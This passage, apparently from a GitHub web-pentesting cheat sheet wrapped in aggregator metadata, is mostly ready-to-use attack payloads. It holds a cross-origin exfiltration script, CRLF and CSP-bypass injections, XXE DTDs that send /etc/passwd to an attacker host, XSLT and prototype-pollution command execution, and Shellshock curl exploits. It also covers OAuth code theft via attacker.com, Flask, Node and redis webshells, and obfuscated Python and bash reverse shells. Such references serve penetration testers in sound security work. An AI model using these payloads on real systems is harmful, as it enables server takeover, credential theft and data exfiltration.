XMLHttpRequest();\nxhr.onreadystatechange = function() {\n\tif (xhr.readyState == XMLHttpRequest.DONE) {\n \t\tvar r = xhr.responseText;\n\t\tvar d = r.split('\u003e')[1].split('\u003c')[0]\n\t\tfunction exfil() {\n\t\t\tdocument.write('\u003cimg src=\"http://your-ip:your-port/log.php?data=' + d + '\"/\u003e');\n\t}\n\texfil();\n\t}\n}\nxhr.open('GET', 'http://site.com/admin.php', true);\nxhr.withCredentials = true;\nxhr.send(null);\n\u003c/script\u003e\n\u003c/head\u003e\u003c/html\u003e\n```  \n\n### Null Origin Exploitation Exfiltrate via url per server + base64\n-\u003e nulloriginb64.html\n```\n\u003ciframe src=\"data:text/html;base64,\u003cYOUR_BASE64_HERE\u003e\"\u003e\u003c/iframe\u003e\n\u003c/head\u003e\u003c/html\u003e\n```\n\n## CRLF Injection (CRLFI)\nCarriage Return (\\r), Line Feed (\\n)  \ne.g.  \n-\u003e Redirect via GET  \n```\n/%0d%0aLocation:attacker\n```  \n-\u003e XSS via GET  \n```\n/%0d%0a%0d%0a\u003csvg onload=\"alert(1)\"\u003e\n```\n\n### XSS-Protection Bypass via CRLF\n```\n/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E\n/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E\n```\n\n### CSP Bypass via CRLF\n```\n%0d%0aX-Content-Security-Policy: allow *%0d%0a%0d%0a\n%0d%0aX-Content-Security-Policy: allow *\n```\n\n### Tools\n```\ncrlfuzz -u \"http://example.com\"\n```\nhttps://github.com/dwisiswant0/crlfuzz\n\n### Template - Nuclei\nhttps://raw.githubusercontent.com/pikpikcu/nuclei-templates/master/vulnerabilities/crlf-injection.yaml\n\n## XML External Entity (XXE)\n### Methods\n```\n\u003c!ENTITY % file SYSTEM \"file:///etc/passwd\"\u003e\n\u003c!ENTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd\"\u003e\n\u003c!ENTITY % file SYSTEM \"php://filter/read=convert.base64-encode/resource=/etc/passwd\"\u003e\n```\n\n### XXE - Blind Out-Of-Band\n#### Exfiltrate data exfiltrating data via dtd\n-\u003e Part 1 (Main Request)\n```\n\u003c!DOCTYPE r[\n\u003c!ELEMENT r ANY\u003e\n\u003c!ENTITY % ult SYSTEM \"http://ip/evil.dtd\"\u003e\n%ult;\n%int;\n]\u003e\n\u003cr\u003e\u0026exfil;\u003c/r\u003e\n```\n  \n-\u003e Part 2 (evil.dtd)\n```\n\u003c!ENTITY % file SYSTEM \"php://filter/read=convert.base64-encode/resource=file:///etc/passwd\"\u003e  \n\u003c!ENTITY % int \"\u003c!ENTITY exfil SYSTEM 'http://ip/?leak=%file;'\u003e\"\u003e  \n```  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/xxe/evil.dtd\n\n### Retrieve data via error messages with dtd file\n-\u003e Part 1 (Request Principal)\n```\n\u003c!DOCTYPE foo [\n\u003c!ENTITY % xxe SYSTEM \"http://ip/error.dtd\"\u003e \n%xxe;\n%payload;\n%remote;\n]\u003e\n```\n-\u003e Part 2 (error.dtd)\n\n```\n\u003c!ENTITY % file SYSTEM \"file:///etc/passwd\"\u003e\n\u003c!ENTITY % payload \"\u003c!ENTITY \u0026#37; remote SYSTEM 'file:///idonotexist/%file;'\u003e\"\u003e\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/xxe/error.dtd  \n\n```\n  \n### XInclude to retrieve files with dtd file\n```\n\u003cfoo xmlns:xi=\"http://www.w3.org/2001/XInclude\"\u003e\u003cxi:include parse=\"text\" href=\"file:///etc/passwd\"/\u003e\u003c/foo\u003e\n```\n\n### Image file upload\n\n```\n\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\u003c!DOCTYPE test [ \u003c!ENTITY xxe SYSTEM \"file:///etc/hostname\" \u003e ]\u003e\u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\u003ctext font-size=\"16\" x=\"0\" y=\"16\"\u003e\u0026xxe;\u003c/text\u003e\u003c/svg\u003e\n```  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/xxe/evil.svg\n\n## XSLT Server Side Injection\n### Identify  \n-\u003e Transformation Service  \n-\u003e XSLT engine  \n\n### Exploit \n-\u003e ok.xsl\n```\n\u003c!--\n- Simple test to call php function\n--\u003e\n\u003cxsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" \nxmlns:php=\"http://php.net/xsl\"\nversion=\"1.0\"\u003e\n\u003c!-- We add the PHP's xmlns --\u003e\n \u003cxsl:template match=\"/\"\u003e\n \u003chtml\u003e\n \u003c!-- We use the php suffix to call the function ucwords() --\u003e\n \u003cxsl:value-of select=\"php:function('system','uname -a')\" /\u003e\n \u003c!-- Output: 'Php Can Now Be Used In Xsl' --\u003e\n \u003c/html\u003e\n \u003c/xsl:template\u003e\n\u003c/xsl:stylesheet\u003e\n```\n\n## Prototype Pollution\n### Client Side\nhttps://github.com/BlackFan/client-side-prototype-pollution\n  \n### Server Side\n-\u003e exec.exec in req body with lodash - application/json\n  \n```\n\"__proto__\":{\n  \"shell\":\"sleep 5\"\n}\n```  \nhttps://nodejs.org/api/child_process.html#child_processexeccommand-options-callback\n  \n-\u003e exec.fork in req body with lodash - application/json  \n\n```\n  \"__proto__\":{\n    \"execPath\":\"/bin/bash\",\n    \"execArgv\":[\n    \"-c\",\n    \"sleep 5\"  \n    ]\n  }\n```  \nhttps://nodejs.org/api/process.html\n\n## Remote Code Execution (RCE)\n-\u003e Special Characters  \n```\n\u0026 command\n\u0026\u0026 command\n; command\ncommand %0A command\n| command\n|| command\n`command`\n$(command)\n```\n\n-\u003e Out Of Band - OOB Exploitation\n```\ncurl http://$(whoami).site.com/\ncurl http://`whoami`.site.com/\nnslookup `whoami`.attacker-server.com \u0026\ncurl http://192.168.0.20/$(whoami)\n```\n\n-\u003e Check if the commands are executed by PowerShell or CMD.\n```\n(dir 2\u003e\u00261 *`|echo CMD);\u0026\u003c# rem #\u003eecho PowerShell \n```\n\n### RCE - Exfiltrating via DNS\n```\ncurl http://$(whoami).site.com/\ncurl http://`whoami`.site.com/\n```\n\n### Shellshock\n-\u003e Detection\n```\nnikto -h \u003cIP\u003e -C all\n```\n\t\n-\u003e Exploit\n```\ncurl -A \"() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'whoami'\" \u003cIP\u003e\ncurl -A \"() { :; };echo ;/bin/bash -c 'hostname'\"  \u003cIP\u003e\ncurl -A \"() { :; }; /usr/bin/nslookup $(whoami).site.com\" \u003cIP\u003e\n```\n\n### Wordlists\nhttps://github.com/payloadbox/command-injection-payload-list\n\n## API Exploitation\n-\u003e API Security Guide  \nhttps://github.com/0xCGonzalo/Golden-Guide-for-Pentesting/tree/master/API%20Security\n\n-\u003e API Security Checklist  \nhttps://github.com/shieldfy/API-Security-Checklist\n\n-\u003e API Security Tips  \nhttps://github.com/inonshk/31-days-of-API-Security-Tips\n\n-\u003e MindAPI  \nhttps://dsopas.github.io/MindAPI/play/  \n\n-\u003e Simple website to guess API Key  \nhttps://api-guesser.netlify.app/\n\n-\u003e HackTricks  \nhttps://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting\n\n-\u003e Fuzzing  \nhttps://github.com/assetnote/kiterunner\n\n### Rest API/JSON\nThe standard documentation is the WADL file:  \ne.g.  \nhttps://site.com/api/v1/wadl/  \nor  \nrepresentation engines  \n-\u003e swagger-ui  \nhttps://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/#newsletter\n\t\n### SOAP/XML\nThe documentation uses WSDL formate and is save in ?wsdl:  \ne.g.  \nhttps://api.example.com/api/?wsdl  \nhttps://site.com/ok.asmx?wsdl  \n\n-\u003e API testing tool  \nhttps://www.soapui.org/downloads/soapui\n\t\n### Graphql\n-\u003e Introspection  \nhttps://ivangoncharov.github.io/graphql-voyager/  \n\t\n-\u003e No-Introspection - Clairvoyance allows us to get GraphQL API schema when introspection is disabled  \nhttps://github.com/nikitastupin/clairvoyance  \n\t\n-\u003e graphw00f - GraphQL Server Fingerprinting  \n```\npython3 main.py -f -t https://demo.hypergraphql.org:8484/graphql\n```\nhttps://github.com/dolevf/graphw00f  \n\t\n-\u003e GraphQL Security - Quickly assess the security of your GraphQL apps  \nhttps://graphql.security/\n\n## JWT Attacks\n-\u003e Structure with jwt.io - decoder  \nhttps://jwt.io/  \n\t\n`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c`\n\t\n`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 (Header)`  \n`eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ (Payload)`  \n`SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c (Signature)`  \n\t\n### JWT None Attack\n1. Change signature algorithm in the header to none  \n`eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0`  \n2. Forge the payload content  \n3. Leave the Signature part of the JWT empty and put a period in the token  \nor  \n-\u003e jwt_tool  \n```\njwt_tool \u003cjwt\u003e -X a \n```\n### JWT Decoder\n-\u003e jwt_tool  \n```\njwt_tool \u003cJWT\u003e\n```\n-\u003e jwt-decoder.py  \n```\npython3 jwt-decoder.py \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4\"\n```\nhttps://github.com/mazen160/jwt-pwn  \n\n### JWT Cracking - Brute-Force\n-\u003e crunch + jwt_tool\n```\ncrunch 5 5 -o wl.txt\n```\n```\njwt_tool \u003cjwt\u003e -C -d wl.txt\n```\n-\u003e go-jwt-cracker  \n```\n./go-jwt-cracker -wordlist /pentest/wordlist.txt -token \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4\"\n```\nhttps://github.com/mazen160/jwt-pwn\n\n-\u003e Hashcat  \n```\nhashcat -a 0 -m 16500 jwt.txt wordlist.txt\nhashcat jwt.txt -m 16500 -a 3 -w 2 ?d?d?d?d\n```\n-\u003e John  \n```\njohn jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256\n```\n\n#### Docs\nhttps://rodolfomarianocy.medium.com/jwt-token-entenda-do-ponto-de-vista-defensivo-e-ofensivo-1aad6406de53\n\t\n## Attacking OAuth\n### Workflow OAuth Authorization Code Grant Type\n1- \n  \n```\nGET /authorization?client_id=\u003cclient_id\u003e\u0026redirect_uri=https://site.com/callback\u0026response_type=code\u0026scope=openid%20profile%20email HTTP/1.1  \nHost: site.com\n```\n2-\n  \n```\nGET /callback?code=\u003ccode\u003e HTTP/1.1\nHost: site.com\n```\nVulnerability Forced OAuth profile linking\n  \n-\u003e CSRF\n```\n\u003chtml\u003e\n\t\u003cbody\u003e\n      \t\t\u003cform action=\"http://site.com/callback?code=\u003ccode\u003e\" method=\"GET\"\u003e\n\t\t\u003c/form\u003e \n\t\u003c/body\u003e\n\t\u003cscript\u003e\n\t\tdocument.forms[0].submit();\n\t\u003c/script\u003e\n\u003c/html\u003e\n```  \n\nVulnerability Code Stealing\n\n-\u003e Open Redirect (redirect_uri)\n```\nhttps://site.com/authorization?client_id=%3Cclient_id%3E\u0026redirect_uri=http://attacker.com/callback\u0026response_type=code\u0026scope=openid%20profile%20email\n```\n3-\n```\nPOST /token HTTP/1.1\nHost: oauth.server.com\n\nclient_id=\u003cclient_id\u003e\u0026client_secret=\u003cclient_secret\u003e\u0026redirect_uri=https://site.com/callback\u0026grant_type=authorization_code\u0026code=\u003ccode\u003e\n```\nVulnerability Brute-Force the Client Secret\n\n```\nPOST /token \nHost: site.com\nContent-Type: application/x-www-form-urlencoded  \n\nclient_id=\u003cclient_id\u003e\u0026client_secret=\u003cBRUTE_FORCE\u003e\u0026redirect_uri=http%3A%2F%2Fip%2Fcallback\u0026grant_type=authorization_code\u0026code=\u003ccode\u003e\n```  \n4-\n```  \n{\n    \"access_token\": \"\u003caccess_token\u003e\",\n    \"token_type\": \"Bearer\",\n    \"expires_in\": 3600,\n    \"scope\": \"openid profile\"\n}\n```\n\n5-\n```  \nGET /userinfo HTTP/1.1  \nHost: oauth.server.com  \nAuthorization: Bearer \u003ctoken\u003e\n```\n\n6- \n```\n{\n    \"username\":\"user\",\n    \"email\":\"user@ok.com\"\n}\n```\n\n## Padding Oracle Attack\ne.g.  \n-\u003e rememberMe: (Cookie)  \n-\u003e Exploiting  \n```\njava -jar ysoserial.jar CommonsBeanutils1 \"touch /tmp/success\" \u003e payload.class\n```  \nhttps://github.com/frohoff/ysoserial  \n```\npython shiro_exp.py site.com/home.jsp cookie payload.class\n```  \nhttps://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py  \n\n## Race Condition\n-\u003e Burp Suite - race condition test using Send group in parallel  \nhttps://portswigger.net/burp/documentation/desktop/tools/repeater/send-group\n\n-\u003e Burp Suite - Extensions -\u003e Turbo Intruder-\u003e Send to Turbo Intruder -\u003e select examples/race-single-packer-attack.py  \nhttps://portswigger.net/web-security/race-conditions\n\n## Content Management System (CMS)\n### Wordpress\n-\u003e wpscan enumeration\n```\nwpscan --url http://site.com/wordpress --api-token \u003cyour_token\u003e --enumerate u,vp --plugins-detection aggressive\nwpscan --url http://site.com/wordpress --api-token \u003cyour_token\u003e --enumerate u,ap\n```\n-\u003e wpscan brute force \n```\nwpscan --url http://site.com/ --passwords wordlist.txt\n```\nhttps://wpscan.com/wordpress-security-scanner\n\n### Joomla\n-\u003e juumla  \n```\npython main.py -u \u003ctarget\u003e\n```  \nhttps://github.com/oppsec/juumla  \n\n### Drupal\n-\u003e droopescan  \n```\ndroopescan scan drupal -u \u003ctarget\u003e -t 32\n```\nhttps://github.com/SamJoan/droopescan  \n\n-\u003e Reverse Shell  \nhttps://www.hackingarticles.in/drupal-reverseshell/\n\n### Magento\nhttps://github.com/steverobbins/magescan \n\n## Third-party Software: ITSM, ITSO, ITBM\n### Jira\n-\u003e Check privileges in:  \n```\n/rest/api/2/mypermissions\n/rest/api/3/mypermissions\n```\n-\u003e jira-scan  \n```\njira-scan -u https://site.com/\n```\nhttps://github.com/bcoles/jira_scan\n\n-\u003e Jiraffe\n```\njiraffe -t https://site.com\n```\nhttps://github.com/0x48piraj/Jiraffe\n\n### SalesForce\n-\u003e sret  \n```\npython3 main.py \u003cURL\u003e\n```\nhttps://github.com/reconstation/sret\n\n### SAP - ERP\n#### Tools\nhttps://github.com/chipik/SAP_RECON\n\n#### Wordlists\nhttps://raw.githubusercontent.com/emadshanab/SAP-wordlist/main/SAP-wordlist.txt\n\n#### Others\nhttps://github.com/shipcod3/mySapAdventures\n\n### ServiceNow\n-\u003e Brute-Force in KB00\u003chere\u003e  \n```\nhttps://company.service-now.com/kb_view_customer.do?sysparm_article=KB00xxxxx\n```\nhttps://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56\n\n### Sharepoint\nhttps://github.com/H0j3n/EzpzSharepoint\n\n## Some payloads for webshells and revshells\n### Webshell Infecting views.py - Python (Flask)\n```\nimport os\nfrom flask import Flask,request,os\n\napp = Flask(__name__)\n   \n@app.route('/okay')\ndef cmd():\n    return os.system(request.args.get('c'))\n\nif __name__ == \"__main__\":\n\tapp.run()\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/views.py\n\t\n### Webshell infecting views.js -\u003e nodejs\n```\nconst express = require('express')\nconst app = express();\n\napp.listen(3000, () =\u003e \n\tconsole.log('...')\n);\nfunction Exec(command){ \n\tconst { execSync } = require(\"child_process\");\n\tconst stdout = execSync(command);\n\treturn \"Result: \"+stdout\n}\napp.get('/okay/:command', (req, res) =\u003e \nres.send(Exec(req.params.command))\n);\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/views.js\n\n### Webshell via redis\n```\nredis-cli -h ip  \nconfig set dir /var/www/html  \nconfig set dbfilename ok.php  \nset test \"\u003c?php system($_GET['okay'); ?\u003e\"  \nsave\n```\n\n### Reverse Shell Obfuscator\ne.g.  \n`python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type hex`  \n```\npy$()thon -$()c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"0xC0A80014\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n```\n`python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type octa`  \n```\npy$()thon -$()c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"0300.0250.0000.0024\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n```  \n`python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type long`  \n\n```\npy$()thon -$()c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3232235540\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n```  \n`python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type urle`  \n```\npy%24%28%29thon%20%24%28%29c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.0.20%22%2C443%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22sh%22%29%27\n```\n`python hackshell.py --payload python --lhost 192.168.0.20 --lport 443 --type b64`  \n```\ncHkkKCl0aG9uIC0kKCljICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4wLjIwIiw0NDMpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw==\n```\n`\npython hackshell.py --payload bash --lhost 192.168.0.20 --lport 443 --type jlre\n`\n```\nbash -c {echo,YmEkKClzaCAtJCgpaSAnL2Rldi90Y3AvMTkyLjE2OC4wLjIwLzQ0MyAwPiYxJw==}|{base64,-d}|{bash,-i}\n```\nhttps://github.com/rodolfomarianocy/hackshell  \n\n-\u003e Other Tricks - Bypass  \n```\n\"__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('id')\";\n```\n  \n## Recon (+)\n### Recon in ASN  \n-\u003e asnpepper  \n```\npython asnpepper.py -o \u003corg\u003e -O output.txt\n```  \n-\u003e masscan  \n```\nmasscan -iL cidrs.txt -oG output.txt — rate 10000 -p 80, 443, 8080\n```  \nor  \n```\npython asnpepper.py -o \u003corg\u003e --test-port 80,443 --threads 2000\n```  \nhttps://bgp.he.net/  \nhttps://github.com/rodolfomarianocy/asnpepper  \nhttps://github.com/robertdavidgraham/masscan  \n\n### One Line Commands\n-\u003e Parameters Discovery  \n```\npython paramspider.py -d stripe.com | uro | httpx -fc 404 -silent | anew spider_parameters.txt \u0026\u0026 echo stripe.com | gau | gf xss | uro |  httpx -fc 404 -silent | anew gau_parameters.txt\n```\n\n### Steps - Web Recon\n#### 1 - Subdomain Discovery\n1.1 -\u003e sublist3r+sort|uniq+httpx+anew  \n```\nsubslit3r -d site.com | sort | uniq | httpx -silent | anew subdomains.txt\n```\n\n1.2 -\u003e subfinder+sort|uniq+httpx+anew  \n```\nsubfinder -d site.com  | sort | uniq | httpx -silent | anew subdomains.txt\n```\n\n1.3 -\u003e crt+jq+grep+httpx+anew  \n```\ncurl \"https://crt.sh/?q=$1\u0026output=json\" | jq -r '.[].name_value' | grep -v \"*\" | httpx -silent | anew subdomains.txt\n```\n\n#### 2 - Parameter Discovery\n2.1 -\u003e gau+gf+uro+httpx+anew  \n```\ncat subdomains.txt | gau | gf xss | uro | httpx -silent | anew parameters.txt\n```\n\n2.2 -\u003e paramspider + uro + httpx  \n```\ncat subdomains.txt | xargs -n 1 python paramspider.py -d | httpx -silent | gf xss | uro | anew parameters.txt\n```  \n\n#### 3 - JS files\n3.1 -\u003e gau+grep+httpx  \n```\ncat subdomains.txt | grep \"\\.js\" | httpx -fc 404 -silent -o js_files.txt\n```  \nor  \n```\ncat subdomains.txt | gau | subjs\n```\n\n#### 4 - Discover endpoints and their parameters in JS files\n```\npython linkfinder.py -i https://example.com/1.js -o results.html\n```\n\n-\u003e Used Tools  \nhttps://github.com/projectdiscovery/subfinder  \nhttps://github.com/aboul3la/Sublist3r  \nhttps://github.com/devanshbatham/ParamSpider  \nhttps://github.com/s0md3v/uro  \nhttps://github.com/projectdiscovery/httpx  \nhttps://github.com/tomnomnom/gf  \nhttps://github.com/1ndianl33t/Gf-Patterns  \nhttps://github.com/stedolan/jq  \nhttps://github.com/lc/subjs  \nhttps://github.com/GerbenJavado/LinkFinder  \n\n#### Other Tools\n-\u003e Project Discovery (Subdomain Discovery)  \nhttps://chaos.projectdiscovery.io/#/  \n-\u003e aquatone (Tool for visual inspection of websites)  \nhttps://github.com/michenriksen/aquatone  \n\n### Fuzzing (+) \n#### Fuzzing Subdomain - DNS\n```\nffuf -u \"https://FUZZ.site.com\" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt\n```\n\n#### Fuzzing Subdomain - VHOST\n```\nffuf  -u \"https://site.com\" -H 'Host: FUZZ.site.com' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs xxx\n```\n\n#### Fuzzing File Extension\n```\nffuf -u \"https://site.com/indexFUZZ\" -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -fs xxx\n```\n\n#### Fuzzing Parameter GET\n```\nffuf -u \"https://site.com/index.php?FUZZ=ok\" -w wordlist.txt -fs xxx\n```\n  \n#### Fuzzing Parameter POST\n```\nffuf -u \"https://site.com/index.php\" -X POST -d 'FUZZ=ok' -H 'Content-Type: application/x-www-form-urlencoded' -w wordlist.txt -fs xxx\n```\n\n## Certifications (+) \n### elearn Web Application Penetration Tester eXtreme - eWPTX\nApresentation def con Caxias do Sul - DCG5554  \nhttps://www.youtube.com/watch?v=2-im6aL6PkI \n![1](https://user-images.githubusercontent.com/54555784/199234358-f3652fa2-14fa-4fc6-9e25-948c4bbace72.png)\n![2](https://user-images.githubusercontent.com/54555784/199234516-227a055a-7413-413d-b6f6-07384a4672de.png)\n![3](https://user-images.githubusercontent.com/54555784/199234532-331177d0-f9da-45a1-a156-d52e1560f8e7.png)\n![4](https://user-images.githubusercontent.com/54555784/199234542-01623a13-7b90-4b80-b6b6-07705ec2cd94.png)\n![5](https://user-images.githubusercontent.com/54555784/199234564-929ff2ae-2410-4605-8fa7-64fa0cab4195.png)\n![6](https://user-images.githubusercontent.com/54555784/199234571-78ebf007-2365-4eeb-b3d1-8c5776ea8b3c.png)\n![7](https://user-images.githubusercontent.com/54555784/199234642-442174e0-f4c8-4033-a179-595da70da270.png)\n![8](https://user-images.githubusercontent.com/54555784/199234650-a9bd4b40-f1b2-4436-ae8d-cb76ab9d9c0b.png)\n![9](https://user-images.githubusercontent.com/54555784/199234657-28fe263a-1d81-4b90-9f23-75ad8394f456.png)\n![10](https://user-images.githubusercontent.com/54555784/199234663-db848e0c-f6cd-4df0-a004-8caffc6e32b6.png)\n![11](https://user-images.githubusercontent.com/54555784/199234674-5f294bb0-46ff-428b-aa85-d819c80b6d2b.png)\n![12](https://user-images.githubusercontent.com/54555784/199234677-dce5513b-ebdf-46f0-8167-9134f28c2e64.png)\n![13](https://user-images.githubusercontent.com/54555784/199234729-5055681c-8841-4f41-b072-dea537f9ba16.png)\n\nReferences:  \nhttps://elearnsecurity.com/product/ewptxv2-certification/  \nhttps://ine.com/learning/courses/web-application-penetration-testing-e-xtreme  \nhttps://rodolfomarianocy.medium.com/overview-ewptx-5a9d78414c7a  \nhttps://crowsec.com.br/  \nhttps://portswigger.net/web-security/all-labs  \n\n## Other tools and things\n#### Search across a half million git repos\nhttps://grep.app\n  \n#### The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis.\nhttps://gchq.github.io/CyberChef/\n  \n#### List of file signatures\nhttps://en.wikipedia.org/wiki/List_of_file_signatures\n\n#### Regex \nhttps://regex101.com/\n\n#### Encode for SQL Injection in Json\nhttps://dencode.com/string/unicode-escape\n  \n#### Wildcard DNS\nhttps://nip.io/\n  \n#### Explain Shell\nhttps://explainshell.com/\n\n#### CeWL - Custom Word List generator\nhttps://github.com/digininja/CeWL\n\n#### Webhook online\nhttps://webhook.site/#!/b3d5ed21-b58d-4a77-b19d-b7cdc2eeadc0\n\n#### builtwith - Find out what websites are Built with\nhttps://builtwith.com/\n\n#### Reverse Shell\nhttps://www.revshells.com/\n \n#### Api Security\nhttps://platform.42crunch.com/\n\n#### Source Code Search Engine\nhttps://publicwww.com/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frodolfomarianocy%2FTricks-Web-Pentest","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frodolfomarianocy%2FTricks-Web-Pentest","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frodolfomarianocy%2FTricks-Web-Pentest/lists"}